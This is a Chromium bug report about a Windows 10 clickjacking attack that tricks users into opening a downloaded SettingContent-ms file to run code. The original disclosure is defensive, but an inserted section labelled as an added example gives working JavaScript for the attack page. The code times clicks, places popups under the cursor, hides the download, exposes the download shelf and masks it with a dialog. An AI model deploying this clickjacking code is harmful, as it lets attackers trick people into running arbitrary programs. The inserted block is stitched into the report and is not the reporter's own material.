Tricking the user into opening a downloaded SettingContent-ms file can lead to Code Execution
Reported by luan.her...@hotmail.com, Jun 12 2018
Issue description

VULNERABILITY DETAILS

It has come to my attention that files with the extension "SettingContent-ms", when opened on Windows 10, can be made to execute automatically even when marked by MotW. This led me to revisit an old PoC I constructed in 2015 (https://www.youtube.com/watch?v=cJVk24w0Y1M) and apply a similar vector to this particular case. Google Safe Browsing also isn't tracking this extension (https://cs.chromium.org/chromium/src/chrome/browser/resources/safe_browsing/download_file_types.asciipb), so it can be downloaded without any warnings in Google Chrome. By combining all of the above, I created a clickjacking attack which, when successful, executes arbitrary code on the victim's machine (as long as they use Windows 10).

The exploit works as follows:

1. The user accesses the attacker's website and clicks on a link.
2. A popup opens asking the user to double-click on a button to go to the next image in the gallery.
3. On the first double-click I open another popup directly above the old one. I then resize the background popup to a very small size (I do this to prevent the "download icon" from signalling to the victim that a download has started). Then, in this same window, I initiate the download of the "testar.SettingContent-ms" file. I also place this popup directly under the ">>" button.
4. The second double-click is not necessary; it merely serves the purpose of "training" the victim to navigate the gallery only through the use of double-clicks.
5. On the first click of the third double-click I resize the actual window's width to be a bit smaller and display part of the downloads shelf (which contains our downloaded file with the payload). On the second click the victim ends up opening the file, which is executed automatically without any warnings.
6. Using the onblur event I call the confirm dialog to quickly hide the download shelf, making the attack stealthier.

The popups may be a bit misaligned because I created the PoC only having my screen resolution in mind. If that happens, following every step very slowly will help you understand what the attack is trying to accomplish. Here is a video simulating the attack: https://www.youtube.com/watch?v=oQO3xglfwps

VERSION

Version 67.0.3396.79 (Official Build) Stable (64-bit)
Version 69.0.3453.0 (Official Build) Canary (64-bit)
Only reproducible on Windows 10.

REPRODUCTION CASE

1. Open https://lbherrera.github.io/lab/exec-clickjacking/index.html
2. Click on the link.
3. Keep double-clicking on the button to go to the next image.
4. After a few clicks, calc.exe should pop up.
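The click choreography described in the report, as an added example that is not part of the original report and not the reporter's PoC. It splits the attack page into two pure functions that can be checked without a browser (which click triggers which action, and where to place a popup so it sits under the victim's cursor) plus a thin DOM layer that only runs inside a page. The element id, popup sizes, the width reduction on the fifth click and the habit of carrying the click count through window.name are all constructed assumptions; the report does not specify them.

```javascript
// Added example, not the reporter's PoC. Every name, size and the way state
// is carried between the two popups is an assumption made for illustration;
// the report only describes the sequence of clicks and what happens on each.

const PAYLOAD_URL = "testar.SettingContent-ms"; // file name quoted in the report

// Map a raw click index on the ">>" button to what the attacker page does.
// Clicks 1-2 form the first double-click, 3-4 the second, 5-6 the third.
function planClick(clickIndex) {
  switch (clickIndex) {
    case 2:            // first double-click completes
      return "cover_and_download"; // open cover popup, shrink old one, start download
    case 3:
    case 4:            // second double-click: training only, nothing happens
      return "noop";
    case 5:            // first click of the third double-click
      return "reveal_shelf";       // let part of the download shelf show
    case 6:            // second click no longer reaches the page:
      return "shelf_click";        // it lands on the downloaded file in the shelf
    default:
      return "noop";
  }
}

// window.open() features that place a popup of the given size exactly over
// an element, so its content sits where the victim's cursor already is.
// `win` needs screenX/screenY/outerHeight/innerHeight; `rect` is what
// getBoundingClientRect() returns for the button (left/top in CSS pixels).
function coverPopupFeatures(win, rect, width, height) {
  const chromeHeight = win.outerHeight - win.innerHeight; // tabs + toolbar
  const left = Math.round(win.screenX + rect.left);
  const top = Math.round(win.screenY + chromeHeight + rect.top);
  return `width=${width},height=${height},left=${left},top=${top}`;
}

// Browser wiring. The same page serves both popups: the cover popup is opened
// with window.name set to the click count so far, so it keeps counting from 3.
function wireGallery(win) {
  const button = win.document.getElementById("next"); // assumed ">>" button id
  let clicks = Number(win.name) || 0;

  button.addEventListener("click", () => {
    clicks += 1;
    switch (planClick(clicks)) {
      case "cover_and_download": {
        // Step 3: new popup directly above this one, under the ">>" button.
        const rect = button.getBoundingClientRect();
        win.open(win.location.href, String(clicks),
          coverPopupFeatures(win, rect, rect.width, rect.height));
        // Shrink this (now background) window so its download icon goes
        // unnoticed, then start the download from it.
        win.resizeTo(1, 1);
        win.location = PAYLOAD_URL;
        break;
      }
      case "reveal_shelf":
        // Step 5 (assumed geometry): narrow the cover so the opener's
        // download shelf, restored to a usable size, peeks out beside it.
        win.resizeTo(win.outerWidth - 120, win.outerHeight);
        if (win.opener) win.opener.resizeTo(win.outerWidth, win.outerHeight);
        break;
      default:
        break;
    }
  });

  // Step 6: once focus leaves (the shelf item was clicked), a confirm()
  // dialog pops up so the shelf is hidden again quickly.
  win.addEventListener("blur", () => win.confirm("Loading next image..."));
}

if (typeof window !== "undefined") {
  wireGallery(window);
}
```

The two pure functions carry the part of the attack that is independent of screen resolution; the report itself notes that the real PoC's popup placement was tuned to the author's screen, which is exactly the quantity coverPopupFeatures computes from the live window instead of hard-coding.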
Comment 1 by elawrence@chromium.org, Jun 12 2018

It seems https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 has resulted in a few people filing the same bug. Duping into 851528.
Sep 23

This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage
- Your friendly Sheriffbot